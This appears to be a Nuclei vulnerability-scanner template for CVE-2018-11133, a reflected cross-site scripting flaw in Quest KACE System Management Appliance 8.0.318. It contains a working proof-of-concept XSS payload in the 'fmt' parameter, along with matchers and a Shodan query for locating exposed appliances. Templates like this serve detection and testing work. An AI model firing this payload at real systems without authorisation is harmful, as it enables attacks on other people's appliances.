漏洞描述
The 'fmt' parameter of the '/common/run_cross_report.php' script in the the Quest KACE System Management Appliance 8.0.318 is vulnerable to cross-site scripting.
id: CVE-2018-11133
info:
name: Quest KACE SMA /common/run_cross_report.php 'fmt' XSS
author: iamnoooob,pdresearch
severity: medium
description: |
The 'fmt' parameter of the '/common/run_cross_report.php' script in the the Quest KACE System Management Appliance 8.0.318 is vulnerable to cross-site scripting.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2018-11133
- https://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-11133
cwe-id: CWE-79
epss-score: 0.00342
epss-percentile: 0.56279
cpe: cpe:2.3:a:quest:kace_system_management_appliance:8.0.318:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: quest
product: kace_system_management_appliance
shodan-query: title:"KACE Systems Management"
tags: cve,cve2018,xss,quest,kace,sma
http:
- raw:
- |
GET /common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(document.domain)%2f%2f952 HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "xls34403');alert(document.domain)//952');"
- 'k-run-report-message'
condition: and
- type: status
status:
- 200
# digest: 490a0046304402202e7d0015fe4c8d1ab281a555de59dd7fc742c2b119627652fd542d261756ca5802204fb8f01c08d678b149f6cc061f8b70c478b18f350aa609aeeb3a370404fea282:922c64590222798bb761d5b6d8e72950